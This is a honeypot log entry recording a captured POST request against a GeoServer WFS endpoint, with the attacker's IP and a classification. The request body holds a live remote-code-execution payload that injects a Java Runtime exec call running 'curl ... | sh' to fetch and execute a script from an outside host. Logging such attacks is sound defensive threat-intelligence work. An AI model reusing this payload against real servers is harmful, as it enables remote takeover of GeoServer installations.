Time | 2024/09/22, 18:29:48 (GMT) |
Transaction ID | 0HDULOIIJ0OSVPFB |
Service | http |
Location | BG (Bulgaria) |
Attacker | 83.222.191.62 |
Classification | Web server control |
Harm Potential | Not |
POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0 Host: 46.4.222.114:8080 Accept: */* Upgrade-Insecure-Requests: 1 Connection: keep-alive Content-Type: application/xml Content-Length: 381 <wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='topp:states' /> <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl http://154.216.19.60/sh | sh -s geoserver')</wfs:valueReference> </wfs:GetPropertyValue>
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |